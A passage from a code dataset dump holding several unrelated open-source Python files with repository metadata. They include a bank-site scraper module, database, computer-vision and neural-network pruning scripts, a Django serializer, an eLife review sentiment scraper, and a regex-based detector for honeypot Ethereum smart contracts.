match_card(tr):\n # ex: account.number=\"1234123456123456\", tr.card=\"1234******123456\"\n return fnmatch(account.number, tr.card)\n hist = self.get_history_base(account.parent, card_number=account.number)\n return keep_only_card_transactions(hist, match_card)\n\n if not self.has_cards_displayed:\n return self.get_history_base(account)\n\n # this is any other account\n return omit_deferred_transactions(self.get_history_base(account))\n\n def get_history_base(self, account, card_number=None):\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'filtreEntree': None,\n 'donneesEntree': json.dumps(account._formated),\n }\n self.cenet_account_history.go(json=data)\n\n while True:\n for tr in self.page.get_history(coming=False):\n # yield transactions from account\n\n # if account is a card, this does not include card_summary detail\n # if account is a checking and has no card displayed on the website but still has deferred\n # transactions listed, we skip the card summary label (eg: CB 0123******3210 TOT DIF JUILLET)\n # and get all the included transactions\n if (\n tr.type == tr.TYPE_CARD_SUMMARY and (\n card_number or re.search(r'^CB [\\d\\*]+ TOT DIF .*', tr.label)\n ) and not self.has_cards_displayed\n ):\n if card_number:\n yield tr\n # checking if card_summary is for this card\n assert tr.card, 'card summary has no card number?'\n if not self._matches_card(tr, card_number):\n continue\n\n # getting detailed transactions for card_summary\n donneesEntree = {}\n donneesEntree['Compte'] = account._formated\n\n donneesEntree['ListeOperations'] = [tr._data]\n deferred_data = {\n 'contexte': '',\n 'dateEntree': None,\n 
'donneesEntree': json.dumps(donneesEntree).replace('/', '\\\\/'),\n 'filtreEntree': json.dumps(tr._data).replace('/', '\\\\/'),\n }\n tr_detail_page = self.cenet_tr_detail.open(json=deferred_data)\n\n parent_tr = tr\n for tr in tr_detail_page.get_history():\n tr.card = parent_tr.card\n yield tr\n else:\n # Insert yield here enables to skip card summary when PSU\n # has no card account (cf previous explanation)\n yield tr\n offset = self.page.next_offset()\n if not offset:\n break\n\n data['filtreEntree'] = json.dumps({\n 'Offset': offset,\n })\n self.cenet_account_history.go(json=data)\n\n @need_login\n def get_coming(self, account):\n if account.type != account.TYPE_CARD:\n return []\n\n trs = []\n\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': json.dumps(account._hist),\n 'filtreEntree': None,\n }\n\n self.cenet_account_coming.go(json=data)\n for tr in self.page.get_history(coming=True):\n trs.append(tr)\n\n return sorted_transactions(trs)\n\n @need_login\n def get_investment(self, account):\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_investments(account.id)\n finally:\n self.cenet_home.go()\n return []\n\n @need_login\n def iter_market_orders(self, account):\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_market_orders(account.id)\n finally:\n self.cenet_home.go()\n return []\n\n @need_login\n def get_advisor(self):\n return [self.cenet_home.stay_or_go().get_advisor()]\n\n @need_login\n def get_profile(self):\n return self.cenet_home.stay_or_go().get_profile()\n\n def iter_recipients(self, origin_account):\n raise NotImplementedError()\n\n def init_transfer(self, account, recipient, transfer):\n raise NotImplementedError()\n\n def new_recipient(self, recipient, **params):\n raise NotImplementedError()\n\n @need_login\n def iter_subscription(self):\n subscriber = self.get_profile().name\n json_data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n self.subscription.go(json=json_data)\n return self.page.iter_subscription(subscriber=subscriber)\n\n @need_login\n def iter_documents(self, subscription):\n sub_id = subscription.id\n input_filter = {\n 'Page': 0,\n 'NombreParPage': 0,\n 'Tris': [],\n 'Criteres': [\n {'Champ': 'Etablissement', 'TypeCritere': 'Equals', 'Value': sub_id},\n {'Champ': 'DateDebut', 'TypeCritere': 'Equals', 'Value': None},\n {'Champ': 'DateFin', 'TypeCritere': 'Equals', 'Value': None},\n {'Champ': 'MaxRelevesAffichesParNumero', 'TypeCritere': 'Equals', 'Value': '100'},\n ],\n }\n json_data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': json.dumps(input_filter),\n }\n self.documents.go(json=json_data)\n return self.page.iter_documents(sub_id=sub_id, sub_label=subscription.label, username=self.username)\n\n @need_login\n def download_document(self, document):\n self.download.go()\n return self.page.download_form(document).content\n\n def iter_emitters(self):\n raise NotImplementedError()\n","repo_name":"rbignon/woob","sub_path":"modules/caissedepargne/cenet/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":17555,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"47"} +{"seq_id":"25743379244","text":"#!/usr/bin/python3\n\"\"\"\nStart link class to table in database\n\"\"\"\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom 
sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n engine = create_engine(\n 'mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]\n ),\n pool_pre_ping=True\n )\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n try:\n ls = session.query(State).order_by(State.id).all()\n for states in ls:\n if 'a' in states.name:\n print(\"{}: {}\".format(states.id, states.name))\n except Exception:\n print(\"Nothing\")\n session.close()\n","repo_name":"j4ir0st/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8401282724","text":"import numpy as np\nimport cv2\n\n# Minimal example of capturing and modifying video with openCV\n# Start the capture\ncap = cv2.VideoCapture(0)\n\n# Infinite loop\nwhile True:\n # Capture frame by frame\n ret, frame = cap.read()\n\n # Perform operations on the frame\n rotate = cv2.rotate(frame, cv2.ROTATE_180)\n\n # Show the frame on openCVs native gui\n cv2.imshow('frame', rotate)\n\n # Quit on press of 'q'\n if(cv2.waitKey(1) & 0xFF == ord('q')):\n break\n\n# Clean up\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"tgrbrooks/RoboAI","sub_path":"src/vision/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8678602896","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn.functional as F\nfrom optimizer import PruneAdam\nfrom model import LeNet, AlexNet\nfrom utils import regularized_nll_loss, admm_loss, \\\n initialize_Z_and_U, update_X, update_Z, update_Z_l1, update_U, \\\n print_convergence, print_prune, apply_prune, apply_l1_prune\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\n\n\ndef train(args, model, device, train_loader, test_loader, optimizer):\n for epoch in range(args.num_pre_epochs):\n print('Pre epoch: {}'.format(epoch + 1))\n model.train()\n for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = regularized_nll_loss(args, model, output, target)\n loss.backward()\n optimizer.step()\n test(args, model, device, test_loader)\n\n Z, U = initialize_Z_and_U(model)\n for epoch in range(args.num_epochs):\n model.train()\n print('Epoch: {}'.format(epoch + 1))\n for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = admm_loss(args, device, model, Z, U, output, target)\n loss.backward()\n optimizer.step()\n X = update_X(model)\n Z = update_Z_l1(X, U, args) if args.l1 else update_Z(X, U, args)\n U = update_U(U, X, Z)\n print_convergence(model, X, Z)\n test(args, model, device, test_loader)\n\n\ndef test(args, model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n 
correct += pred.eq(target.view_as(pred)).sum().item()\n\n    test_loss /= len(test_loader.dataset)\n\n    print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n        test_loss, correct, len(test_loader.dataset),\n        100. * correct / len(test_loader.dataset)))\n\n\ndef retrain(args, model, mask, device, train_loader, test_loader, optimizer):\n    for epoch in range(args.num_re_epochs):\n        print('Re epoch: {}'.format(epoch + 1))\n        model.train()\n        for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n            data, target = data.to(device), target.to(device)\n            optimizer.zero_grad()\n            output = model(data)\n            loss = F.nll_loss(output, target)\n            loss.backward()\n            optimizer.prune_step(mask)\n\n    test(args, model, device, test_loader)\n\n\ndef main():\n    # Training settings\n    parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n    parser.add_argument('--dataset', type=str, default=\"mnist\", choices=[\"mnist\", \"cifar10\"],\n                        metavar='D', help='training dataset (mnist or cifar10)')\n    parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n                        help='input batch size for training (default: 64)')\n    parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n                        help='input batch size for testing (default: 1000)')\n    parser.add_argument('--percent', nargs='+', type=float, default=[0.8, 0.92, 0.991, 0.93],  # type=list would split a CLI value into characters\n                        metavar='P', help='pruning percentage (default: 0.8)')\n    parser.add_argument('--alpha', type=float, default=5e-4, metavar='L',\n                        help='l2 norm weight (default: 5e-4)')\n    parser.add_argument('--rho', type=float, default=1e-2, metavar='R',\n                        help='cardinality weight (default: 1e-2)')\n    parser.add_argument('--l1', default=False, action='store_true',\n                        help='prune weights with l1 regularization instead of cardinality')\n    parser.add_argument('--l2', default=False, action='store_true',\n                        help='apply l2 regularization')\n    parser.add_argument('--num_pre_epochs', type=int, default=3, metavar='P',\n                        help='number of epochs to pretrain (default: 3)')\n    parser.add_argument('--num_epochs', type=int, default=10, metavar='N',\n                        help='number of epochs to train (default: 10)')\n    parser.add_argument('--num_re_epochs', type=int, default=3, metavar='R',\n                        help='number of epochs to retrain (default: 3)')\n    parser.add_argument('--lr', type=float, default=1e-3, metavar='LR',\n                        help='learning rate (default: 1e-3)')\n    parser.add_argument('--adam_epsilon', type=float, default=1e-8, metavar='E',\n                        help='adam epsilon (default: 1e-8)')\n    parser.add_argument('--no-cuda', action='store_true', default=False,\n                        help='disables CUDA training')\n    parser.add_argument('--seed', type=int, default=1, metavar='S',\n                        help='random seed (default: 1)')\n    parser.add_argument('--save-model', action='store_true', default=False,\n                        help='For Saving the current Model')\n    args = parser.parse_args()\n\n    use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n    torch.manual_seed(args.seed)\n\n    device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n    kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n    if args.dataset == \"mnist\":\n        train_loader = torch.utils.data.DataLoader(\n            datasets.MNIST('data', train=True, download=True,\n                           transform=transforms.Compose([\n                               transforms.ToTensor(),\n                               transforms.Normalize((0.1307,), (0.3081,))\n                           ])),\n            batch_size=args.batch_size, shuffle=True, **kwargs)\n\n        test_loader = torch.utils.data.DataLoader(\n            datasets.MNIST('data', train=False, transform=transforms.Compose([\n                transforms.ToTensor(),\n                transforms.Normalize((0.1307,), (0.3081,))\n            ])),\n            
batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n else:\n args.percent = [0.8, 0.92, 0.93, 0.94, 0.95, 0.99, 0.99, 0.93]\n args.num_pre_epochs = 5\n args.num_epochs = 20\n args.num_re_epochs = 5\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.49139968, 0.48215827, 0.44653124),\n (0.24703233, 0.24348505, 0.26158768))\n ])), shuffle=True, batch_size=args.batch_size, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('data', train=False, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.49139968, 0.48215827, 0.44653124),\n (0.24703233, 0.24348505, 0.26158768))\n ])), shuffle=True, batch_size=args.test_batch_size, **kwargs)\n\n model = LeNet().to(device) if args.dataset == \"mnist\" else AlexNet().to(device)\n optimizer = PruneAdam(model.named_parameters(), lr=args.lr, eps=args.adam_epsilon)\n\n train(args, model, device, train_loader, test_loader, optimizer)\n mask = apply_l1_prune(model, device, args) if args.l1 else apply_prune(model, device, args)\n print_prune(model)\n test(args, model, device, test_loader)\n retrain(args, model, mask, device, train_loader, test_loader, optimizer)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"bzantium/pytorch-admm-pruning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"47"} +{"seq_id":"30344287913","text":"# -*- coding: utf-8 -*-\n###\n### SmartModules > Smart Modules Loader\n###\nimport os\nimport glob\nimport importlib\n\nfrom lib.core.Config import *\nfrom lib.output.Logger import logger\n\n\nclass SmartModulesLoader:\n\n def __init__(self, sqlsess, services_config):\n self.sqlsess = sqlsess\n self.list_mods = list()\n \n for file in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):\n mod_name = os.path.basename(file)[:-3]\n if not mod_name.startswith('__') and not mod_name.startswith('SmartModule'):\n #mod = __import__(mod_name, globals(), locals())\n module = importlib.import_module('lib.smartmodules.'+mod_name)\n # Instantiate module and store instances in list\n self.list_mods.append(getattr(module, mod_name)(services_config))\n\n\n def __get_smartmodule(self, service):\n mod = list(filter(lambda x: x.service == service, self.list_mods))\n return mod[0] if mod else None\n\n\n def call_start_method(self, service):\n mod = self.__get_smartmodule(service.name)\n if not mod:\n return False\n\n logger.smartinfo('Running initialization method...')\n result = mod.start(service)\n if result:\n result.update_service(service)\n self.sqlsess.commit()\n return True\n\n\n def call_postcheck_method(self, method_name, service, cmd_output):\n \"\"\"\n :param service: Service object\n \"\"\"\n mod = self.__get_smartmodule(service.name)\n if not mod or not mod.is_valid_postcheck_method(method_name):\n return False\n method = mod.get_postcheck_method(method_name)\n\n logger.smartinfo('Running post-check method \"{method}\" ...'.format(method=method_name))\n result = method(cmd_output)\n if result:\n result.update_service(service)\n self.sqlsess.commit()\n return True\n\n\n#loader = SmartModulesLoader()\n#loader.callMethod('http', 'testMethod3', 
None)","repo_name":"yottaiq/jok3r","sub_path":"lib/smartmodules/SmartModulesLoader.py","file_name":"SmartModulesLoader.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"47"} +{"seq_id":"18222397340","text":"def Swap(arr, i, low):\n temp = arr[i]\n arr[i] = arr[low]\n arr[low]= temp\n\ndef Partition(arr,left, right):\n pivot = arr[right]\n low = left -1\n\n for i in range(left,right):\n if arr[i]<= pivot:\n low += 1\n Swap(arr, i, low)\n\n Swap(arr, right, low+1)\n return low+1\n\ndef QuickSort(arr , left, right):\n if left < right:\n position = Partition(arr, left, right)\n\n QuickSort(arr, left, position-1)\n QuickSort(arr, position+1, right)\n\n return arr\n\nif __name__ == \"__main__\":\n \n testArray = [8,4,23,42,16,15]\n print(f'Array: {testArray}')\n QuickSort(testArray,0,5)\n print(f'Sorted Array: {testArray}')\n\n\n","repo_name":"eslamakram/data-structures-and-algorithms","sub_path":"python/code_challenges/quick-sort/quick_sort/quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"36117097936","text":"\"\"\" 06/08/23 by Victoria Hwang\n This script uses webscraping to extract peer review from eLife's published \n preprints, with the goal to calculate sentiment scores from these texts. \n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport time\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk import ngrams\n\ndef extract_assessment(topic, num_pages, rating):\n # Step 1: Setup \n\n # url = the webpage that lists all the papers. \n url = \"https://elifesciences.org/reviewed-preprints\"\n\n # For all the papers, find the link to the paper.\n base_url = \"https://elifesciences.org\"\n base_url2 = \"https://elifesciences.org/reviewed-preprints\"\n topics = []\n titles = []\n assessments = []\n scores = []\n ratings = []\n page_no = 0\n paper_no = 0\n\n for page in range(1, num_pages+1):\n \n result = requests.get(url)\n # create BeautifulSoup object to parse html content of webpage\n soup = BeautifulSoup(result.content, \"html.parser\")\n\n # Step 2. 
Get links to all the papers listed.\n\n        # Get the list containing all the papers.\n        papers_list = soup.find(\"ol\", class_=\"listing-list\")\n        # Get all the papers in the list.\n        papers = papers_list.find_all(\"li\", class_=\"listing-list__item\")\n        page_no += 1\n        print(\"Page:\", page_no)\n        # For each paper, get its link:\n        for paper in papers:\n\n            paper_no += 1\n\n            paper_link = paper.find(\"a\", class_ =\"teaser__header_text_link\")\n            paper_link_url = base_url + paper_link[\"href\"]\n\n            try: \n                # Using the paper link, access paper contents:\n                paper_content = requests.get(paper_link_url)\n                paper_soup = BeautifulSoup(paper_content.content, \"html.parser\")\n\n                # Find the paper topic\n                paper_topic = paper_soup.find(\"a\", class_=\"article-flag__link\")\n                \n                # Find the paper title\n                paper_title = paper_soup.find(\"h1\", class_=\"title\")\n                print(paper_title.text)\n\n                # Find all paragraphs, keep the first one\n                eLife_section = paper_soup.find(\"div\", class_=\"review-content_body\")\n                \n                eLife_paragraphs = eLife_section.find_all(\"p\")\n                eLife_assessment = eLife_paragraphs[1]\n                paragraph = eLife_assessment.text.strip() \n                \n\n                # Keep only the papers whose score matches the given rating\n                paper_score = simpleAnalysis(paragraph)\n                paper_rating = giveRating(paper_score)\n\n                if rating == 'Any':\n                    if topic == \"Any\" or topic == paper_topic.text.strip():\n                        topics.append(paper_topic.text.strip())\n                        titles.append(paper_title.text.strip())\n                        assessments.append(paragraph)\n                        scores.append(paper_score)\n                        ratings.append(paper_rating)\n\n                elif rating == \"Doubtful\" and paper_score < -0.5:\n                    if topic == \"Any\" or topic == paper_topic.text.strip():\n                        topics.append(paper_topic.text.strip())\n                        titles.append(paper_title.text.strip())\n                        assessments.append(paragraph)\n                        scores.append(paper_score)\n                        ratings.append(paper_rating)\n\n                elif rating == \"Useful\" and -0.5 <= paper_score < 0:\n                    if topic == \"Any\" or topic == paper_topic.text.strip():\n                        topics.append(paper_topic.text.strip())\n                        titles.append(paper_title.text.strip())\n                        assessments.append(paragraph)\n                        scores.append(paper_score)\n                        ratings.append(paper_rating)\n                \n                elif rating == \"Good\" and 0 <= paper_score < 1:\n                    if topic == \"Any\" or topic == paper_topic.text.strip():\n                        topics.append(paper_topic.text.strip())\n                        titles.append(paper_title.text.strip())\n                        assessments.append(paragraph)\n                        scores.append(paper_score)\n                        ratings.append(paper_rating)\n                \n                elif rating == \"Excellent\" and paper_score == 1:\n                    if topic == \"Any\" or topic == paper_topic.text.strip():\n                        topics.append(paper_topic.text.strip())\n                        titles.append(paper_title.text.strip())\n                        assessments.append(paragraph)\n                        scores.append(paper_score)\n                        ratings.append(paper_rating)\n                \n                else:\n                    continue\n                \n                time.sleep(2)\n\n            except AttributeError:\n                # Handle the case when the attribute of the webpage is not found\n                continue\n\n        # Go to next page of papers\n        new_url = base_url2 + \"?page=\" + str(page+1) # page numbering begins on page 2\n        url = new_url\n\n    # Create Database\n    df = pd.DataFrame({\"Topic\":topics, \"Title\":titles, \"Rating\":ratings, \"Assessment\":assessments, \"Score\":scores}) \n    print(df)\n    \n    df.to_csv(\"eLife.csv\", index=False) # Save Data to CSV file\n\n    print(paper_no)\n
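\n# Illustrative helper (an assumption, not from the original script): a minimal\n# worked example of the weighted keyword score computed by simpleAnalysis() below.\n# One \"important\" hit (weight 0.5) plus one \"incomplete\" hit (weight -1) gives\n# (0.5 - 1.0) / 2 = -0.25, which giveRating() maps to \"Useful\".\ndef _score_formula_example():\n    demo = \"The evidence is important but the analysis is incomplete.\"\n    return simpleAnalysis(demo)  # expected: -0.25\n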
\"further strengthened\", \"require additional\"] # -0.25\n bad_words = [\"inadequate\"] # -0.5\n worst_words = [\"incomplete\"] # -1\n\n num_best = 0\n num_great = 0\n num_good = 0 \n num_pos = 0\n num_neu = 0\n num_neg = 0\n num_bad = 0\n num_worst = 0\n \n stop_words = set(stopwords.words('english')) # remove unecessary words\n num_words = 0 # initialize new counter for paragraph after stop words are filtered\n paragraph = paragraph.lower()\n\n # Generate n-grams from tokenized words\n tokens = word_tokenize(paragraph)\n n = 2 # Change this to the desired n-gram size\n ngrams_list = list(ngrams(tokens, n))\n\n # Check words:\n for word in tokens:\n if word not in stop_words:\n num_words += 1\n if word in best_words:\n num_best += 1\n elif word in great_words:\n num_great += 1\n elif word in good_words:\n num_good += 1\n elif word in pos_words:\n num_pos += 1\n elif word in neu_words:\n num_neu += 1\n elif word in neg_words:\n num_neg += 1\n elif word in bad_words:\n num_bad += 1\n elif word in worst_words:\n num_worst += 1\n\n # Check phraes:\n for ngram in ngrams_list:\n phrase = \" \".join(ngram)\n if phrase in neg_words:\n num_neg += 1\n\n \n meaningful_words = num_best+num_great+num_good+num_pos+num_neu+num_neg+num_bad+num_worst\n score = ((num_best)+(0.75*num_great)+(0.5*num_good)+(0.25*num_pos)+\\\n (0*num_neu)+(-0.25*num_neg)+(-0.5*num_bad)+(-1*num_worst)) / meaningful_words\n \n return score\n\ndef giveRating(paper_score): # a simple method to convert numerical rating into description\n rating = \"\"\n\n if paper_score < -0.5:\n rating = \"Doubtful\"\n elif -0.5 <= paper_score < 0:\n rating = \"Useful\"\n elif 0 <= paper_score < 1:\n rating = \"Good\"\n elif paper_score == 1:\n rating = \"Excellent\"\n \n return rating \n \n \ndef main():\n #format: extract_assessment(\"Topic, number pages to search, paper rating\")\n extract_assessment(\"Any\", 29, \"Any\")\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"vickyhwang77/sentimentAnalysis_PeerReview","sub_path":"eLifeScraper.py","file_name":"eLifeScraper.py","file_ext":"py","file_size_in_byte":8120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25204079898","text":"from typing import List\nimport cv2\nimport numpy\nfrom .detection_strategy import LandmarksDetectionStrategy\n\nclass OpenCVStrategy(LandmarksDetectionStrategy):\n def __init__(self, frame_dimensions=(640, 480), landmark_model_path=\"/home/eduardonunes/workspace/org_tcc/GSOC2017/data/lbfmodel.yaml\"):\n self.width = frame_dimensions[0]\n self.height = frame_dimensions[1]\n\n face_detect_path = cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\"\n self.cas = cv2.CascadeClassifier(face_detect_path)\n\n self.face_markers = cv2.face.createFacemarkLBF()\n self.face_markers.loadModel(landmark_model_path)\n\n def get_the_closest_face(self, faces):\n closest_face = numpy.zeros(shape=(1,4))\n for face in faces:\n if face[2] > closest_face[0][2]:\n closest_face[0] = face\n return closest_face \n \n def draw_detected_faces(self, frame, faces):\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),1)\n\n def draw_face_landmarks_numbers(self, frame, shape):\n label = 0\n for (x, y) in shape:\n font = cv2.FONT_HERSHEY_SIMPLEX \n fontScale = 0.3\n color = (0, 255, 255) \n thickness = 1\n cv2.putText(frame, str(label), (round(x),round(y)), font, fontScale, color, thickness, cv2.LINE_AA, False)\n label += 1\n\n def draw_face_landmarks(self, frame, shape):\n for (x, y) in 
shape:\n            cv2.circle(frame, (round(x), round(y)), 2, (0, 255, 255), -1)\n\n    def get_face_landmarks(self, frame: List) -> List:\n        faces = self.cas.detectMultiScale(frame, \n                                    scaleFactor=1.05, \n                                    minNeighbors=3, \n                                    flags=cv2.CASCADE_SCALE_IMAGE, \n                                    minSize=(int(self.width/5), int(self.width/5)))\n\n        shape = None \n\n        if type(faces) is numpy.ndarray and faces.size > 0: \n            closest_face = self.get_the_closest_face(faces)\n\n            _, landmarks = self.face_markers.fit(frame, faces=closest_face)\n\n            shape = landmarks[0][0]\n\n            self.draw_face_landmarks(frame, shape)\n        \n        self.draw_detected_faces(frame, faces)\n        \n        return shape\n","repo_name":"ednunes/tcc-project","sub_path":"addon/algorithms/opencv_strategy.py","file_name":"opencv_strategy.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27729508323","text":"from rest_framework import serializers\nfrom app.models import User, Record\n\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = [\n            'pk',\n            'created',\n            'first_name',\n            'last_name'\n        ]\n\n    def validate_first_name(self, value):\n        qs = User.objects.filter(first_name__iexact=value)\n        if qs.exists():\n            raise serializers.ValidationError(\"User exists\")\n        return value\n\n    def create(self, validated_data):\n        return User.objects.create(**validated_data)\n\nclass RecordSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Record\n        fields = [\n            'pk',\n            'created',\n            'title',\n            'artist',\n            'genre',\n            'year',\n            'quanity_available'\n        ]\n\n    def create(self, validated_data):\n        return Record.objects.create(**validated_data)","repo_name":"bowenbrinegar/django-sql-record-store","sub_path":"api/app/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40649521896","text":"import re\r\nfrom loadJson import load_json\r\n\r\n'''\r\nIn practice, a straw man contract is about behavior: what really needs to be checked is whether the straw man contract used inside the creator's contract matches the contract content at the address that was passed in.\r\nIf they do not match, it is a straw man.\r\nFor an address initialized in the constructor, the corresponding address can also be recovered from the bytecode, i.e. only the creator's single contract-creation action is needed;\r\nfor an address passed in through an onlyOwner-restricted function, the creator additionally needs one function call.\r\nFor example,\r\nthe address 0xf331f7887d31714dce936d9a9846e6afbe82e0a0 initializes its straw man contract in the constructor, but the contract content matches the content at that address, so it is not a honeypot.\r\n'''\r\n\r\npattern_exclude_1 = re.compile(r'(.*)library SafeMath\\s*(.*)')\r\npattern_exclude_noPayable = re.compile(r'(.*payable.*)') # payable only became mandatory from 0.4.x onwards.\r\n# pattern_exclude_noInterface = re.compile(r'function([\\s\\S]*?)[)];')\r\npattern_exclude_noInterface = re.compile(r'function([^{}]*?)[)];')\r\npattern_compiler = re.compile(r'pragma solidity \\^([.0-9]*);')\r\n\r\n# Matching straw man contracts - position 1\r\npattern_contractName = re.compile(r'(.*)contract\\s+(.*)')\r\npattern_2_constructor_2 = re.compile(r\"constructor(\\s*)[(](.*)address (.*)[)]\") # Line breaks may also occur here and are not handled yet; see function Ico( in the benign contract at 0xf331f7887d31714dce936d9a9846e6afbe82e0a0\r\npattern_2_function_onlyOwner_3 = re.compile(r'function (.*)[(](.*)address (.*)[)](.*)(\\n*)(.*)(\\n*)(.*)onlyOwner')\r\n# pattern_2_function_onlyOwner_3 = re.compile(r'function (.*)[(](.*)address (.*)[)](.*)onlyOwner')\r\n\r\n# Matching straw man contracts - position 2\r\npattern_3_delegatecall_1 = re.compile(r'.delegatecall[(](.*)[)]')\r\npattern_4_transfer_1 = re.compile(r'.transfer[(](.*)[)]')\r\npattern_4_send_2 = re.compile(r'.send[(](.*)[)]')\r\npattern_4_call_3 = re.compile(r'.call.value[(](.*)[)][(][)]')\r\n\r\n# Matching straw man contracts - position 3\r\n'''The third kind is really just a hidden state update, so it is meant to be handled together with the hidden-state-update logic''' # and it really is implemented in the HSU script!\r\n
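\r\n# A minimal self-check of the position-1 / position-2 patterns above. Both the\r\n# toy Solidity fragment and the helper name _pattern_smoke_test are illustrative\r\n# assumptions, not part of the original detector.\r\ndef _pattern_smoke_test():\r\n    toy = \"contract A { constructor (address _impl) public {} function f() public { owner.transfer(1); } }\"\r\n    assert re.findall(pattern_2_constructor_2, toy) != [] # position 1: a constructor taking an address\r\n    assert re.findall(pattern_4_transfer_1, toy) != [] # position 2: a transfer(...) call\r\n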
\r\ndef delect_more_space_row(vcode):\r\n    return \"\".join([s for s in vcode.splitlines(True) if s.strip()])\r\n\r\ndef function_or_modifier_split(vcode, splitStr='function'):\r\n    # 1-1. Split the comment-free code on 'function'\r\n    vcode_split_by_Function_list = vcode.split(splitStr)\r\n    # print('vcode_split_by_Function_list is: ',vcode_split_by_Function_list)\r\n    function_code_list = []\r\n    for i in vcode_split_by_Function_list[1:]:\r\n        # if (i.strip(' ')[-1] != '\\n'):\r\n        # print(\"i is: \",i)\r\n        left_index = 0\r\n        right_index = -1\r\n        # Curly braces are unlikely to be used as ordinary characters in a smart contract\r\n        left_BigBucket_indexs = [i.start() for i in re.finditer('{', i)]\r\n        # print(left_BigBucket_indexs, \"*********\")\r\n        right_BigBucket_indexs = [i.start() for i in re.finditer('}', i)]\r\n        # print(right_BigBucket_indexs)\r\n        if ((left_BigBucket_indexs == []) and (right_BigBucket_indexs == [])) or \\\r\n            ((left_BigBucket_indexs==[]) and (right_BigBucket_indexs!=[])) or \\\r\n            (right_BigBucket_indexs[0] 2) and ((i[:2] == '//') or (i[:4] == '/**/')):\r\n            # vcode = vcode.replace(i, '')\r\n            comment_record_list.append(i)\r\n            rows_len -= 1\r\n    comment_record_list.sort(reverse=True)\r\n    # print('comment_record_list is: ',comment_record_list)\r\n    for comment_record in comment_record_list:\r\n        vcode = vcode.replace(comment_record, '')\r\n    # print(rows_len) # line count after removing comments\r\n    # if rows_len > max:\r\n    #     max = rows_len\r\n    # if rows_len < min:\r\n    #     min = rows_len\r\n    # print(min, max)\r\n    # Use three times the largest effective line count of current honeypots to define complex logic; anything above is treated as complex logic, which does not appeal to novice attackers.\r\n    if rows_len > 450:\r\n        # continue\r\n        return 0\r\n\r\n    # Remove comments further\r\n    vcode = vcode.replace('/**/', '')\r\n    pattern_with_comment = re.compile(r'(//.*)')\r\n    